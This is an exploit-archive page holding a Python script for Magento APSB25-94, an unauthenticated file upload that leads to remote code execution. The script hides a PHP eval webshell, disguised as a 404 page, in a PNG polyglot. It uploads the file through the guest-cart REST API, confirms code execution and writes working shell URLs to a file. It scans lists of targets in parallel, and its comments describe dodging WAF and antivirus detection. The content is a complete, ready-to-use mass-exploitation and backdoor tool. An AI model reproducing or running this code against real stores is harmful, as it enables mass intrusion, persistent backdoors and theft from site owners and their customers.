5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / magento_godzilla.py PY
#!/usr/bin/env python3
"""
Magento APSB25-94 — Unauthenticated File Upload to RCE
Modified: Upload Godzilla webshell + multi-threaded batch scan
Usage: python3 magento_godzilla.py -f urls.txt [-t 20] [-p pass] [-k key]
"""

import requests
import base64
import random
import string
import struct
import zlib
import argparse
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
import threading

import sys
import functools
print = functools.partial(print, flush=True)

requests.packages.urllib3.disable_warnings()

# ─── Godzilla Webshell (PHP_EVAL_XOR_BASE64) ───
# 默认连接参数: pass=pass  key=key
# Godzilla 客户端选择: PHP -> PhpEvalXor -> base64
# 一句话 eval shell(带 404 伪装)
SHELL_TEMPLATE = r"""<?php @error_reporting(0);if(!isset($_POST['{pass}'])){echo '<!DOCTYPE HTML><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>';exit;}eval($_POST['{pass}']);?>"""

# 无害探测文件 — 不含 eval/system/exec 等敏感函数,不触发 WAF/AV
# 仅 echo 一个标记字符串,用于确认:1) 文件上传成功 2) PHP 可执行
PROBE_TEMPLATE = r"""<?php echo 'PROBE_'.'OK_'.PHP_VERSION;?>"""
PROBE_MARKER = "PROBE_OK_"

SHELL_404_MARKER = "was not found on this server"

TINY_PNG = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAD0lEQVR4AQEEAPv/AHf66QRGAluYv6aFAAAAAElFTkSuQmCC"
JSON_HEADERS = {"Accept": "application/json", "Content-Type": "application/json"}
TIMEOUT = 30

counter_lock = threading.Lock()
stats = {"total": 0, "vuln": 0, "uploaded": 0, "fail": 0}

# 写文件锁 — 每条结果立刻落盘,Ctrl+C 也不丢数据
write_lock = threading.Lock()
output_path = None  # main 里赋值


def queue_result(line):
    """立刻写一条结果到文件"""
    with write_lock:
        with open(output_path, "a", encoding="utf-8") as f:
            f.write(line + "\n")
            f.flush()


def flush_results():
    """兼容旧调用,现在每条都即时写了,这里什么都不做"""
    pass

UPLOAD_PATHS = [
    "/pub/media/custom_options/quote/{0}/{1}/{2}",
    "/media/custom_options/quote/{0}/{1}/{2}",
]


def banner():
    print("""
 ┌─────────────────────────────────────────────┐
 │  Magento APSB25-94  Eval Shell Drop          │
 │  Unauthenticated File Upload → RCE          │
 └─────────────────────────────────────────────┘
""")


def make_png_polyshell(php_code: bytes) -> bytes:
    """纯 Python 构造 PNG polyshell

    技巧:在合法 PNG 数据末尾(IEND 之后)追加 PHP 代码。
    PNG 解析器忽略 IEND 之后的数据,图片校验通过。
    PHP 解析器扫描整个文件,找到 <?php 标签后执行。
    PNG 头部的二进制垃圾会被 PHP 当作 inline HTML 输出(无害),
    但 <?php ?> 之间的代码会正常执行。
    """
    sig = b'\x89PNG\r\n\x1a\n'

    def make_chunk(chunk_type: bytes, data: bytes) -> bytes:
        raw = chunk_type + data
        return struct.pack('>I', len(data)) + raw + struct.pack('>I', zlib.crc32(raw) & 0xffffffff)

    ihdr_data = struct.pack('>IIBBBBB', 1, 1, 8, 2, 0, 0, 0)
    ihdr = make_chunk(b'IHDR', ihdr_data)
    idat = make_chunk(b'IDAT', zlib.compress(b'\x00\xff\x00\x00'))
    iend = make_chunk(b'IEND', b'')

    # PHP 代码追加在 IEND 之后 — PNG 合法,PHP 可执行
    return sig + ihdr + idat + iend + php_code


def build_payload(shell_code):
    """构造 PNG polyshell,无需 exiftool"""
    filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + '.php'
    png_bytes = make_png_polyshell(shell_code.encode('utf-8'))
    return filename, base64.b64encode(png_bytes).decode()


def get_sku(session, base_url):
    """通过 GraphQL 获取任意商品 SKU"""
    query = '{ products(search: "", pageSize: 1) { items { sku } } }'
    resp = session.post(
        f"{base_url}/graphql",
        headers=JSON_HEADERS,
        json={"query": query},
        timeout=TIMEOUT,
        verify=False
    )
    return resp.json()['data']['products']['items'][0]['sku']


def create_cart(session, base_url):
    """创建 guest 购物车,返回 cart_id"""
    resp = session.post(
        f"{base_url}/rest/default/V1/guest-carts",
        headers=JSON_HEADERS,
        timeout=TIMEOUT,
        verify=False
    )
    return resp.json()


def upload_shell(session, base_url, cart_id, sku, b64_payload, filename):
    """通过 custom_options file_info 上传 polyshell"""
    json_body = {
        "cart_item": {
            "product_option": {
                "extension_attributes": {
                    "custom_options": [{
                        "extension_attributes": {
                            "file_info": {
                                "base64_encoded_data": b64_payload,
                                "name": filename,
                                "type": "image/png"
                            }
                        },
                        "option_id": "12345",
                        "option_value": "file"
                    }]
                }
            },
            "qty": 1,
            "sku": sku
        }
    }
    resp = session.post(
        f"{base_url}/rest/default/V1/guest-carts/{cart_id}/items",
        headers=JSON_HEADERS,
        json=json_body,
        timeout=TIMEOUT,
        verify=False
    )
    return resp


def check_shell(session, base_url, filename, shell_pass, **_):
    """探测上传后的 webshell 是否存在且可执行

    判断逻辑:
      GET  → HTTP 200 + body 含伪装 404 = PHP 执行了
      POST → eval 验证,echo 标记字符串确认 RCE
    """
    for path_tpl in UPLOAD_PATHS:
        url = base_url + path_tpl.format(filename[0], filename[1], filename)
        try:
            resp = session.get(url, timeout=TIMEOUT, verify=False)

            if resp.status_code == 404:
                continue

            if resp.status_code == 200 and SHELL_404_MARKER in resp.text:
                if '<?php' in resp.text and '@error_reporting' in resp.text:
                    return url, "UPLOADED_NOT_EXEC"
                # eval 验证
                verify_resp = session.post(
                    url,
                    data={shell_pass: 'echo "RCE_".php_uname();'},
                    timeout=TIMEOUT,
                    verify=False
                )
                if verify_resp.status_code == 200 and "RCE_" in verify_resp.text:
                    return url, "RCE_CONFIRMED"
                else:
                    return url, "UPLOADED_MAYBE_EXEC"

            if resp.status_code == 200:
                if '<?php' in resp.text:
                    return url, "UPLOADED_NOT_EXEC"
                return url, "UPLOADED_UNKNOWN"

        except Exception:
            continue
    return None, None


def check_probe(session, base_url, filename):
    """检查探测文件是否存活 — 返回 (url, php_version) 或 (None, None)"""
    for path_tpl in UPLOAD_PATHS:
        url = base_url + path_tpl.format(filename[0], filename[1], filename)
        try:
            resp = session.get(url, timeout=TIMEOUT, verify=False)
            if resp.status_code == 200 and PROBE_MARKER in resp.text:
                ver = resp.text[resp.text.index(PROBE_MARKER) + len(PROBE_MARKER):]
                ver = ver.split('<')[0].split('\n')[0].strip()
                return url, ver
        except Exception:
            continue
    return None, None


def test_target(base_url, shell_code, shell_pass, _unused_key, output_file):
    """单个目标完整测试流程:先投探测文件确认路径,再投 shell"""
    base_url = base_url.rstrip('/')
    host = urlparse(base_url).hostname
    session = requests.Session()
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    })

    try:
        # Step 1: 获取 SKU
        try:
            sku = get_sku(session, base_url)
        except Exception:
            print(f"  [-] {host} — SKU 获取失败,跳过")
            with counter_lock:
                stats["fail"] += 1
            return
        print(f"  [+] {host} — SKU: {sku}")

        # Step 2: 创建购物车
        try:
            cart_id = create_cart(session, base_url)
        except Exception:
            print(f"  [-] {host} — 购物车创建失败")
            with counter_lock:
                stats["fail"] += 1
            return

        # Step 3: 先投探测文件(无害,不会被杀)
        probe_code = PROBE_TEMPLATE
        probe_name, probe_b64 = build_payload(probe_code)
        try:
            upload_shell(session, base_url, cart_id, sku, probe_b64, probe_name)
        except Exception:
            pass

        time.sleep(0.3)
        probe_url, php_ver = check_probe(session, base_url, probe_name)

        if probe_url:
            print(f"  [+] {host} — 探测文件存活! PHP {php_ver} | {probe_url}")

            # Step 4: 探测成功,再投 eval shell
            try:
                cart_id2 = create_cart(session, base_url)
            except Exception:
                print(f"  [-] {host} — 第二次购物车创建失败")
                with counter_lock:
                    stats["fail"] += 1
                return

            shell_name, shell_b64 = build_payload(shell_code)
            try:
                upload_shell(session, base_url, cart_id2, sku, shell_b64, shell_name)
            except Exception as e:
                print(f"  [-] {host} — Shell 上传失败: {e}")
                with counter_lock:
                    stats["fail"] += 1
                return

            time.sleep(0.3)
            shell_url, status = check_shell(session, base_url, shell_name, shell_pass)

            if shell_url and status == "RCE_CONFIRMED":
                print(f"  [!!] {host} — RCE 确认! Shell: {shell_url}")
                print(f"  [!!] 连接: POST {shell_pass}=phpinfo();")
                with counter_lock:
                    stats["vuln"] += 1
                    stats["uploaded"] += 1
                queue_result(f"RCE_CONFIRMED | {shell_url} | param={shell_pass} | PHP={php_ver}")
            elif shell_url:
                print(f"  [!]  {host} — Shell 上传但可能被杀: {shell_url} ({status})")
                # 探测文件活着说明路径可达,shell 被杀了记录探测 URL 作为备用
                with counter_lock:
                    stats["vuln"] += 1
                queue_result(f"SHELL_KILLED | {shell_url} | probe={probe_url} | PHP={php_ver}")
            else:
                # shell 文件不存在但探测文件在 — 大概率 eval 被 WAF 拦截
                print(f"  [!]  {host} — Shell 被拦截,但探测文件存活(可手动投马)")
                print(f"  [!]  {host} — 探测URL: {probe_url}")
                with counter_lock:
                    stats["vuln"] += 1
                queue_result(f"PROBE_ONLY | probe={probe_url} | PHP={php_ver} | shell_blocked")
        else:
            # 探测文件也没落地 — 不受影响或已打补丁
            print(f"  [-] {host} — 探测文件未落地,不受影响")
            with counter_lock:
                stats["fail"] += 1

    except Exception as e:
        print(f"  [-] {host} — 异常: {e}")
        with counter_lock:
            stats["fail"] += 1


def main():
    banner()

    parser = argparse.ArgumentParser(description="Magento APSB25-94 Eval Shell Batch Scanner")
    parser.add_argument('-f', '--file', required=True, help="URL 列表文件,每行一个")
    parser.add_argument('-t', '--threads', type=int, default=10, help="并发线程数 (默认 10)")
    parser.add_argument('-p', '--password', default='pass', help="Shell POST 参数名 (默认 pass)")
    parser.add_argument('-k', '--key', default='', help="(保留参数,eval 模式不需要)")
    parser.add_argument('-o', '--output', default='shells.txt', help="输出文件 (默认 shells.txt)")
    args = parser.parse_args()

    global output_path
    output_path = args.output

    # 生成 webshell — 用 replace 而非 format 避免大括号冲突
    shell_code = SHELL_TEMPLATE.replace(
        "{{", "\x00LBRACE\x00"
    ).replace(
        "}}", "\x00RBRACE\x00"
    ).replace(
        "{pass}", args.password
    ).replace(
        "{key}", args.key
    ).replace(
        "\x00LBRACE\x00", "{"
    ).replace(
        "\x00RBRACE\x00", "}"
    )

    # 读取目标,自动补 scheme
    urls = []
    with open(args.file, 'r') as f:
        for line in f:
            line = line.strip()
            if not line or line.startswith('#'):
                continue
            if not line.startswith('http://') and not line.startswith('https://'):
                urls.append('https://' + line)
                urls.append('http://' + line)
            else:
                urls.append(line)
    # 去重
    urls = list(dict.fromkeys(urls))

    print(f"[*] 目标数: {len(urls)}  线程数: {args.threads}")
    print(f"[*] Shell 参数名: {args.password}")
    print(f"[*] 输出文件: {args.output}")
    print(f"[*] {'='*50}")

    with counter_lock:
        stats["total"] = len(urls)

    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = {
            executor.submit(test_target, url, shell_code, args.password, args.key, args.output): url
            for url in urls
        }
        for future in as_completed(futures):
            try:
                future.result()
            except Exception as e:
                print(f"  [-] 线程异常: {e}")

    # 刷盘残余
    flush_results()

    # 汇总
    print(f"\n{'='*50}")
    print(f"[*] 扫描完成")
    print(f"    总目标: {stats['total']}")
    print(f"    存在漏洞: {stats['vuln']}")
    print(f"    RCE/Shell可用: {stats['uploaded']}")
    print(f"    失败/不受影响: {stats['fail']}")
    if stats['vuln'] > 0:
        print(f"    结果已保存: {args.output}")


if __name__ == "__main__":
    main()